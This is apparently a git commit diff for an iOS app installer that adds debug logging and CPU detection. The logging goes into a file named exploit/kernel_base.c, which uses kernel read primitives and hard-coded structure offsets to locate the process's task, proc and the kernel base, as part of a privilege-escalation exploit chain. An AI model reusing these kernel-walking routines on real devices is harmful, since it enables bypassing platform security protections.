add some logs

2022-09-06 11:59:45 +02:00 · 2022-09-06 11:59:45 +02:00 · 217df53ec3
parent 961e9b3a53
commit 217df53ec3
2 changed files with 21 additions and 1 deletions
--- a/Installer/TrollInstaller/TrollInstaller/ViewController.m
+++ b/Installer/TrollInstaller/TrollInstaller/ViewController.m
@ -14,6 +14,7 @@
 #import <spawn.h>
 #import <sys/stat.h>
 #include <sys/utsname.h>
+#import <sys/sysctl.h>

 extern uint64_t g_self_proc;
 extern int g_exp_fallback;
@ -171,7 +172,12 @@ int dropRoot(void)
    struct utsname u;
    uname(&u);
    NSString* nsMachine = [NSString stringWithUTF8String:u.machine];
-    _modelLabel.text = [NSString stringWithFormat:@"Model: %@", nsMachine];
+    
+    cpu_subtype_t cpuFamily = 0;
+    size_t cpuFamilySize = sizeof(cpuFamily);
+    sysctlbyname("hw.cpufamily", &cpuFamily, &cpuFamilySize, NULL, 0);
+    
+    _modelLabel.text = [NSString stringWithFormat:@"Model: %@, CPU: 0x%X", nsMachine, cpuFamily];
 }

 - (void)reloadExploitValue {
@ -212,6 +218,8 @@ int dropRoot(void)

 - (void)updateStatus:(NSString*)status
 {
+    NSLog(@"status: %@", status);
+    usleep(1000);
    dispatch_async(dispatch_get_main_queue(), ^{
        self.statusLabel.text = status;
    });
--- a/Installer/TrollInstaller/TrollInstaller/exploit/kernel_base.c
+++ b/Installer/TrollInstaller/TrollInstaller/exploit/kernel_base.c
@ -48,8 +48,14 @@ uint64_t kernel_base_from_holder(mach_port_t holder, uint64_t holder_addr)
    uint64_t fops = kread64(kobject + 0x28);
    
    uint64_t x68 = xpaci(kread64(kmsg + 0x68));
+    badLog("x68: %llX", x68);
+    usleep(1000);
    uint64_t self_ipc_space = xpaci(kread64(x68 + 0x50));
+    badLog("self_ipc_space: %llX", self_ipc_space);
+    usleep(1000);
    uint64_t self_task = xpaci(kread64(self_ipc_space + 0x30));
+    badLog("self_task: %llX", self_task);
+    usleep(1000);

    struct utsname u;
    uname(&u);
@ -79,8 +85,14 @@ uint64_t kernel_base_from_holder(mach_port_t holder, uint64_t holder_addr)
 #else
    off_task_bsd_info = 0x3A0; // a9-a11
 #endif
+    
+    
+    badLog("off_task_bsd_info: %llX", off_task_bsd_info);
+    usleep(1000);

    g_self_proc = xpaci(kread64(self_task + off_task_bsd_info));
+    badLog("g_self_proc: %llX", g_self_proc);
+    usleep(1000);
    
    // find kernel base
    uint64_t pos = (fops & ~0x3FFF);